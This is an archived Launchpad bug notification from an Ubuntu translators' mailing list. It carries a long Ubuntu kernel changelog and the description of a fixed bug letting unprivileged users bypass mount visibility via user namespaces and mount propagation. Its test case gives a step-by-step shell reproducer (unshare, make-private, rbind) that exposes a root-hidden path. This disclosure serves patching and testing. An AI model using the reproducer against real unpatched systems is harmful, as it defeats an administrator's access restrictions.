← Back to team overview

group.of.nepali.translators team mailing list archive

[Bug 1789161] Re: Bypass of mount visibility through userns + mount propagation

 

This bug was fixed in the package linux - 4.19.0-12.13

---------------
linux (4.19.0-12.13) disco; urgency=medium

  * linux: 4.19.0-12.13 -proposed tracker (LP: #1813664)

  * kernel oops in bcache module (LP: #1793901)
    - SAUCE: bcache: never writeback a discard operation

  * Disco update: 4.19.18 upstream stable release (LP: #1813611)
    - ipv6: Consider sk_bound_dev_if when binding a socket to a v4 mapped address
    - mlxsw: spectrum: Disable lag port TX before removing it
    - mlxsw: spectrum_switchdev: Set PVID correctly during VLAN deletion
    - net: dsa: mv88x6xxx: mv88e6390 errata
    - net, skbuff: do not prefer skb allocation fails early
    - qmi_wwan: add MTU default to qmap network interface
    - ipv6: Take rcu_read_lock in __inet6_bind for mapped addresses
    - net: clear skb->tstamp in bridge forwarding path
    - netfilter: ipset: Allow matching on destination MAC address for mac and
      ipmac sets
    - gpio: pl061: Move irq_chip definition inside struct pl061
    - drm/amd/display: Guard against null stream_state in set_crc_source
    - drm/amdkfd: fix interrupt spin lock
    - ixgbe: allow IPsec Tx offload in VEPA mode
    - platform/x86: asus-wmi: Tell the EC the OS will handle the display off
      hotkey
    - e1000e: allow non-monotonic SYSTIM readings
    - usb: typec: tcpm: Do not disconnect link for self powered devices
    - selftests/bpf: enable (uncomment) all tests in test_libbpf.sh
    - of: overlay: add missing of_node_put() after add new node to changeset
    - writeback: don't decrement wb->refcnt if !wb->bdi
    - serial: set suppress_bind_attrs flag only if builtin
    - bpf: Allow narrow loads with offset > 0
    - ALSA: oxfw: add support for APOGEE duet FireWire
    - x86/mce: Fix -Wmissing-prototypes warnings
    - MIPS: SiByte: Enable swiotlb for SWARM, LittleSur and BigSur
    - crypto: ecc - regularize scalar for scalar multiplication
    - arm64: perf: set suppress_bind_attrs flag to true
    - drm/atomic-helper: Complete fake_commit->flip_done potentially earlier
    - clk: meson: meson8b: fix incorrect divider mapping in cpu_scale_table
    - samples: bpf: fix: error handling regarding kprobe_events
    - usb: gadget: udc: renesas_usb3: add a safety connection way for
      forced_b_device
    - fpga: altera-cvp: fix probing for multiple FPGAs on the bus
    - selinux: always allow mounting submounts
    - ASoC: pcm3168a: Don't disable pcm3168a when CONFIG_PM defined
    - scsi: qedi: Check for session online before getting iSCSI TLV data.
    - drm/amdgpu: Reorder uvd ring init before uvd resume
    - rxe: IB_WR_REG_MR does not capture MR's iova field
    - efi/libstub: Disable some warnings for x86{,_64}
    - jffs2: Fix use of uninitialized delayed_work, lockdep breakage
    - clk: imx: make mux parent strings const
    - pstore/ram: Do not treat empty buffers as valid
    - media: uvcvideo: Refactor teardown of uvc on USB disconnect
    - powerpc/xmon: Fix invocation inside lock region
    - powerpc/pseries/cpuidle: Fix preempt warning
    - media: firewire: Fix app_info parameter type in avc_ca{,_app}_info
    - ASoC: use dma_ops of parent device for acp_audio_dma
    - media: venus: core: Set dma maximum segment size
    - staging: erofs: fix use-after-free of on-stack `z_erofs_vle_unzip_io'
    - net: call sk_dst_reset when set SO_DONTROUTE
    - scsi: target: use consistent left-aligned ASCII INQUIRY data
    - scsi: target/core: Make sure that target_wait_for_sess_cmds() waits long
      enough
    - selftests: do not macro-expand failed assertion expressions
    - arm64: kasan: Increase stack size for KASAN_EXTRA
    - clk: imx6q: reset exclusive gates on init
    - arm64: Fix minor issues with the dcache_by_line_op macro
    - bpf: relax verifier restriction on BPF_MOV | BPF_ALU
    - kconfig: fix file name and line number of warn_ignored_character()
    - kconfig: fix memory leak when EOF is encountered in quotation
    - mmc: atmel-mci: do not assume idle after atmci_request_end
    - btrfs: volumes: Make sure there is no overlap of dev extents at mount time
    - btrfs: alloc_chunk: fix more DUP stripe size handling
    - btrfs: fix use-after-free due to race between replace start and cancel
    - btrfs: improve error handling of btrfs_add_link
    - tty/serial: do not free trasnmit buffer page under port lock
    - perf intel-pt: Fix error with config term "pt=0"
    - perf tests ARM: Disable breakpoint tests 32-bit
    - perf svghelper: Fix unchecked usage of strncpy()
    - perf parse-events: Fix unchecked usage of strncpy()
    - perf vendor events intel: Fix Load_Miss_Real_Latency on SKL/SKX
    - netfilter: ipt_CLUSTERIP: check MAC address when duplicate config is set
    - netfilter: ipt_CLUSTERIP: remove wrong WARN_ON_ONCE in netns exit routine
    - netfilter: ipt_CLUSTERIP: fix deadlock in netns exit routine
    - x86/topology: Use total_cpus for max logical packages calculation
    - dm crypt: use u64 instead of sector_t to store iv_offset
    - dm kcopyd: Fix bug causing workqueue stalls
    - perf stat: Avoid segfaults caused by negated options
    - tools lib subcmd: Don't add the kernel sources to the include path
    - dm snapshot: Fix excessive memory usage and workqueue stalls
    - perf cs-etm: Correct packets swapping in cs_etm__flush()
    - perf tools: Add missing sigqueue() prototype for systems lacking it
    - perf tools: Add missing open_memstream() prototype for systems lacking it
    - quota: Lock s_umount in exclusive mode for Q_XQUOTA{ON,OFF} quotactls.
    - clocksource/drivers/integrator-ap: Add missing of_node_put()
    - dm: Check for device sector overflow if CONFIG_LBDAF is not set
    - Bluetooth: btusb: Add support for Intel bluetooth device 8087:0029
    - ALSA: bebob: fix model-id of unit for Apogee Ensemble
    - sysfs: Disable lockdep for driver bind/unbind files
    - IB/usnic: Fix potential deadlock
    - scsi: mpt3sas: fix memory ordering on 64bit writes
    - scsi: smartpqi: correct lun reset issues
    - ath10k: fix peer stats null pointer dereference
    - scsi: smartpqi: call pqi_free_interrupts() in pqi_shutdown()
    - scsi: megaraid: fix out-of-bound array accesses
    - iomap: don't search past page end in iomap_is_partially_uptodate
    - ocfs2: fix panic due to unrecovered local alloc
    - mm/page-writeback.c: don't break integrity writeback on ->writepage() error
    - mm/swap: use nr_node_ids for avail_lists in swap_info_struct
    - userfaultfd: clear flag if remap event not enabled
    - mm, proc: be more verbose about unstable VMA flags in /proc/<pid>/smaps
    - iwlwifi: mvm: Send LQ command as async when necessary
    - Bluetooth: Fix unnecessary error message for HCI request completion
    - ipmi: fix use-after-free of user->release_barrier.rda
    - ipmi: msghandler: Fix potential Spectre v1 vulnerabilities
    - ipmi: Prevent use-after-free in deliver_response
    - ipmi:ssif: Fix handling of multi-part return messages
    - ipmi: Don't initialize anything in the core until something uses it
    - Linux 4.19.18

  * tls selftest failures/hangs on i386 (LP: #1813607)
    - [Config] CONFIG_TLS=n for i386

  * Intel XL710 - i40e driver does not work with kernel 4.15 (Ubuntu 18.04)
    (LP: #1779756)
    - i40e: prevent overlapping tx_timeout recover

  * Disco update: 4.19.17 upstream stable release (LP: #1813016)
    - tty/ldsem: Wake up readers after timed out down_write()
    - tty: Don't hold ldisc lock in tty_reopen() if ldisc present
    - can: gw: ensure DLC boundaries after CAN frame modification
    - netfilter: nf_conncount: replace CONNCOUNT_LOCK_SLOTS with CONNCOUNT_SLOTS
    - netfilter: nf_conncount: split gc in two phases
    - netfilter: nf_conncount: restart search when nodes have been erased
    - netfilter: nf_conncount: merge lookup and add functions
    - netfilter: nf_conncount: move all list iterations under spinlock
    - netfilter: nf_conncount: speculative garbage collection on empty lists
    - netfilter: nf_conncount: fix argument order to find_next_bit
    - mmc: sdhci-msm: Disable CDR function on TX
    - Revert "scsi: target: iscsi: cxgbit: fix csk leak"
    - scsi: target: iscsi: cxgbit: fix csk leak
    - scsi: target: iscsi: cxgbit: fix csk leak
    - arm64/kvm: consistently handle host HCR_EL2 flags
    - arm64: Don't trap host pointer auth use to EL2
    - ipv6: fix kernel-infoleak in ipv6_local_error()
    - net: bridge: fix a bug on using a neighbour cache entry without checking its
      state
    - packet: Do not leak dev refcounts on error exit
    - tcp: change txhash on SYN-data timeout
    - tun: publish tfile after it's fully initialized
    - lan743x: Remove phy_read from link status change function
    - smc: move unhash as early as possible in smc_release()
    - r8169: don't try to read counters if chip is in a PCI power-save state
    - bonding: update nest level on unlink
    - ip: on queued skb use skb_header_pointer instead of pskb_may_pull
    - r8169: load Realtek PHY driver module before r8169
    - crypto: sm3 - fix undefined shift by >= width of value
    - crypto: caam - fix zero-length buffer DMA mapping
    - crypto: authencesn - Avoid twice completion call in decrypt path
    - crypto: ccree - convert to use crypto_authenc_extractkeys()
    - crypto: bcm - convert to use crypto_authenc_extractkeys()
    - crypto: authenc - fix parsing key with misaligned rta_len
    - crypto: talitos - reorder code in talitos_edesc_alloc()
    - crypto: talitos - fix ablkcipher for CONFIG_VMAP_STACK
    - xen: Fix x86 sched_clock() interface for xen
    - Revert "btrfs: balance dirty metadata pages in btrfs_finish_ordered_io"
    - btrfs: wait on ordered extents on abort cleanup
    - Yama: Check for pid death before checking ancestry
    - scsi: core: Synchronize request queue PM status only on successful resume
    - scsi: sd: Fix cache_type_store()
    - mips: fix n32 compat_ipc_parse_version
    - MIPS: BCM47XX: Setup struct device for the SoC
    - MIPS: lantiq: Fix IPI interrupt handling
    - drm/i915/gvt: Fix mmap range check
    - OF: properties: add missing of_node_put
    - mfd: tps6586x: Handle interrupts on suspend
    - media: v4l: ioctl: Validate num_planes for debug messages
    - RDMA/nldev: Don't expose unsafe global rkey to regular user
    - RDMA/vmw_pvrdma: Return the correct opcode when creating WR
    - kbuild: Disable LD_DEAD_CODE_DATA_ELIMINATION with ftrace & GCC <= 4.7
    - net: dsa: realtek-smi: fix OF child-node lookup
    - pstore/ram: Avoid allocation and leak of platform data
    - arm64: kaslr: ensure randomized quantities are clean to the PoC
    - arm64: dts: marvell: armada-ap806: reserve PSCI area
    - Disable MSI also when pcie-octeon.pcie_disable on
    - fix int_sqrt64() for very large numbers
    - omap2fb: Fix stack memory disclosure
    - media: vivid: fix error handling of kthread_run
    - media: vivid: set min width/height to a value > 0
    - bpf: in __bpf_redirect_no_mac pull mac only if present
    - ipv6: make icmp6_send() robust against null skb->dev
    - LSM: Check for NULL cred-security on free
    - media: vb2: vb2_mmap: move lock up
    - sunrpc: handle ENOMEM in rpcb_getport_async
    - netfilter: ebtables: account ebt_table_info to kmemcg
    - block: use rcu_work instead of call_rcu to avoid sleep in softirq
    - selinux: fix GPF on invalid policy
    - blockdev: Fix livelocks on loop device
    - sctp: allocate sctp_sockaddr_entry with kzalloc
    - tipc: fix uninit-value in in tipc_conn_rcv_sub
    - tipc: fix uninit-value in tipc_nl_compat_link_reset_stats
    - tipc: fix uninit-value in tipc_nl_compat_bearer_enable
    - tipc: fix uninit-value in tipc_nl_compat_link_set
    - tipc: fix uninit-value in tipc_nl_compat_name_table_dump
    - tipc: fix uninit-value in tipc_nl_compat_doit
    - block/loop: Don't grab "struct file" for vfs_getattr() operation.
    - block/loop: Use global lock for ioctl() operation.
    - loop: Fold __loop_release into loop_release
    - loop: Get rid of loop_index_mutex
    - loop: Push lo_ctl_mutex down into individual ioctls
    - loop: Split setting of lo_state from loop_clr_fd
    - loop: Push loop_ctl_mutex down into loop_clr_fd()
    - loop: Push loop_ctl_mutex down to loop_get_status()
    - loop: Push loop_ctl_mutex down to loop_set_status()
    - loop: Push loop_ctl_mutex down to loop_set_fd()
    - loop: Push loop_ctl_mutex down to loop_change_fd()
    - loop: Move special partition reread handling in loop_clr_fd()
    - loop: Move loop_reread_partitions() out of loop_ctl_mutex
    - loop: Fix deadlock when calling blkdev_reread_part()
    - loop: Avoid circular locking dependency between loop_ctl_mutex and bd_mutex
    - loop: Get rid of 'nested' acquisition of loop_ctl_mutex
    - loop: Fix double mutex_unlock(&loop_ctl_mutex) in loop_control_ioctl()
    - loop: drop caches if offset or block_size are changed
    - drm/fb-helper: Ignore the value of fb_var_screeninfo.pixclock
    - selftests: Fix test errors related to lib.mk khdr target
    - media: vb2: be sure to unlock mutex on errors
    - nbd: Use set_blocksize() to set device blocksize
    - Linux 4.19.17

  * Enable sound card power saving by default (LP: #1804265)
    - [Config] CONFIG_SND_HDA_POWER_SAVE_DEFAULT=1

  * Fix non-working QCA Rome Bluetooth after S3 (LP: #1812812)
    - USB: Add new USB LPM helpers
    - USB: Consolidate LPM checks to avoid enabling LPM twice

  * [SRU] Fix Xorg crash with nomodeset when BIOS enable 64-bit fb addr
    (LP: #1812797)
    - vgaarb: Add support for 64-bit frame buffer address
    - vgaarb: Keep adding VGA device in queue

  * bluetooth controller not detected with 4.15 kernel (LP: #1810797)
    - SAUCE: btqcomsmd: introduce BT_QCOMSMD_HACK
    - [Config] arm64: snapdragon: BT_QCOMSMD_HACK=y

  * [19.04 FEAT| Enable virtio-gpu for s390x (LP: #1799467)
    - [Config] enable virtio-gpu for s390x

  * Miscellaneous Ubuntu changes
    - Revert "UBUNTU: SAUCE: selftests: disable some failing networking tests"
    - SAUCE: selftests: net: replace AF_MAX with INT_MAX in socket.c
    - SAUCE: selftests/ftrace: Fix tab expansion in trace_marker snapshot trigger
      test
    - update dkms package versions

  * Miscellaneous upstream changes
    - selftests/ftrace: Fix checkbashisms errors
    - selftests/powerpc/pmu: Link ebb tests with -no-pie

 -- Seth Forshee <seth.forshee@xxxxxxxxxxxxx>  Mon, 28 Jan 2019 15:38:30
-0600

** Changed in: linux (Ubuntu Disco)
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1789161

Title:
  Bypass of mount visibility through userns + mount propagation

Status in linux package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in linux source package in Bionic:
  Fix Released
Status in linux source package in Cosmic:
  Fix Released
Status in linux source package in Disco:
  Fix Released

Bug description:
  [Impact]

  Jonathan Calmels from NVIDIA reported that he's able to bypass the
  mount visibility security check in place in the Linux kernel by using
  a combination of the unbindable property along with the private mount
  propagation option to allow a unprivileged user to see a path which
  was purposefully hidden by the root user.

  [Test Case]

  Reproducer:
  # Hide a path to all users using a tmpfs
  root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
  root@castiana:~#

  # As an unprivileged user, unshare user namespace and mount namespace
  stgraber@castiana:~$ unshare -U -m -r

  # Confirm the path is still not accessible
  root@castiana:~# ls /sys/devices/

  # Make /sys recursively unbindable and private
  root@castiana:~# mount --make-runbindable /sys
  root@castiana:~# mount --make-private /sys

  # Recursively bind-mount the rest of /sys over to /mnnt
  root@castiana:~# mount --rbind /sys/ /mnt

  # Access our hidden /sys/device as an unprivileged user
  root@castiana:~# ls /mnt/devices/
  breakpoint  cpu  cstate_core  cstate_pkg  i915  intel_pt  isa  kprobe  LNXSYSTM:00  msr  pci0000:00  platform  pnp0  power  software  system  tracepoint  uncore_arb  uncore_cbox_0  uncore_cbox_1  uprobe  virtual

  [Regression Potential]

  Low. The fixes are relatively simple. Regressions would most likely be
  specific to software utilizing user namespaces + mount propagation
  which is a small (but often important) portion of the Ubuntu archive.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+subscriptions